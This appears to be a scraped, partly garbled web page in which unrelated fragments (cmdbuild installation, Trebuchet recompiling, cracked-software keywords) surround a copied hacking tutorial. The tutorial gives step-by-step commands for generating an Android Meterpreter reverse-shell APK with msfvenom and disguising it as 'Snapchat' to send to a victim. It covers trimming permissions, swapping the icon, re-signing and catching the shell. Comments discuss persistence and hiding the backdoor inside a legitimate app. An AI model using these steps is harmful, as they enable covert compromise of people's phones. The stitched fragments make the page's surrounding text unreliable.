Dec 14, 2017 - The app also allows for custom setups. Cmdbuild Installation Ubuntu Youtube Babylon Voice Free Download Cracked Fraps Tpbank. Aug 26, 2014 Installing cmdbuild on Ubuntu 14.04 LTS So the instructions on the Ubuntu wiki are good, but I found I had to make some slight changes in order to get it to work on the latest (at this time!) Ubuntu LTS version (14.04).
I have been trying to change, decompile, and recompile Trebuchet to change the items on the dock and home screen. I keep getting errors, and I think I have finally found the solution.
The output of the command is quite long, so let me post the beginning: skp@chestnut:/app/hd2/dev/work$ apktool b Trebuchet-orig Trebuchet.apk I: Copying classes.dex file. I: Checking whether resources has changed. I: Building resources.
Well hello dear readers of Null byte, let me start off stating english is not my first language and they will be some grammar mistakes. This also is my first tutorial so don't hesitate to give me feedback:) You may have made a malicious apk (android package) before on kali, it is done the same way you make a malicious exe. Done by msfvenom.
In this short tutorial I will show you how to change the icon, permissions, and name of the app, to make it more convincing for your victim. Something which can be very relevant when you are Social Engineering someone. Step 1: Making the Malicious Apk So, lets start off by making our meterpreter apk. Enter this code in the terminal msfvenom -p android/meterpreter/reverse tcp LHOST=(your ip) LPORT=(your port) -o app.apk This will create app.apk in your current folder. Now comes the hard part. Step 2: Installing Apktool You will need to install on your system, I used windows for this, but it should be done the same way on linux/mac os.
Since this is different for everybody I won't cover installing this tool. Check out for your system. Do note that Apktool is installed by default in the reverse engineering toolkit from Kali linux! Step 3: Decompiling Your Apk First check if you can run apktool properly by running the command: apktool If you get the help menu, everything is installed correctly.
Now run the command apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files. Most likly:.
The 'res' folder. The AndroidManifest.xml file. The 'smali' folder. The 'orginal' folder. The apktool.yml file Step 4: Modifying the Files For this tutorial we are only going to modify the AndroidManifest.xml file and the 'res' folder.
First off, open the AndroidManifest.xml with your preffered text editor. I am using Notepad. You will see something like this. Image via First off, lets delete a few lines we will probably not need and will give the user an extra warning. Since nullbyte messes with symbols You're back?
Now we are going into the 'res' folder. Here you will find 'values' folder, go into it. Now you will find 2 files, 1 named strings.xml, once again, open this xml file with your preffered text editor.
![]()
You will find the line MainActivity Change 'MainActivity' to you prefferd app name, I chose the name 'Snapchat'. But choose a name which you seem fit for your situation. Save the file and go back up to the /res/ folder. Create 3 folders named:. drawable-ldpi-v4. drawable-mdpi-v4. drawable-hdpi-v4 You will need now to find an appropriate icon set for your app.
I used the website's and The goal is to get 3 png files of the following sizes:. 36x36 (pixels) for the ldpi folder. 48x48 for the mdpi folder.
72x72 for the hdpi folder Name these png files all 'icon.png' and place them in the appropriate folder. Step 5: Compiling Your App This process is very straight forward. Go back to the apktool terminal and enter the following command: apktool b /pathtoyourfolder/folder This will create an apk in the newly created 'dist' folder (found in apktool b /pathtoyourfolder/folder) You thought we were done?
Almost, just one more step. Step 6: Signing the Apk I here is a zip used for signing or if that doesn't work. Unzip the file and cd into the new folder, now use the command: java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon. Step 7: Listing for the Connection Now the final part, open up metasploit using: msfconsole Open multi/handler use multi/handler set the payload set payload android/meterpreter/reverse tcp set LHOST and LPORT set LPORT (your port) set LHOST (your host) and exploit exploit Now once the open up the app, you will get an incoming meterpreter shell, sweet right?
I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.Bart Related. I tested it on my android device today and works fine! Thanks again. However, as I said it's so fragile.
The session was closed after a while. If we are lucky we'll wait them to 'accidentally' click on it again. So, we really need to make it persistent like starting automatically after reboot(but if we have one shot we have to be sure that it'll try to give us session after phone connect the internet succesfully) or it'll run every x seconds itself like: But it's not that persistent if the victim's phone is not rooted which in most scenario it's not!
![]()
Still, I think the best option is binding it with a legit app like AVG, since it asks for lots of permissions already, nobody will get suspicious about it. I tried to compile our backdoor with avg but couldn't make any progress. Hello Burt, thanks for the tutorial. I followed through the steps you mentioned, and it was all fine until I reached step 5.
Here in this step I've a problem. When I execute the command 'apktool b /pathtoyourfolder/folder', i get the following error (sorry, I couldn't upload the screenshot): apktool b /root/app I: Using Apktool 2.1.1 I: Checking whether sources has changed.
I: Checking whether resources has changed. I: Building resources. When i type: apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder On terminal, i get this error: I: Baksmaling. I: Loading resource table.
Comments are closed.
|
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |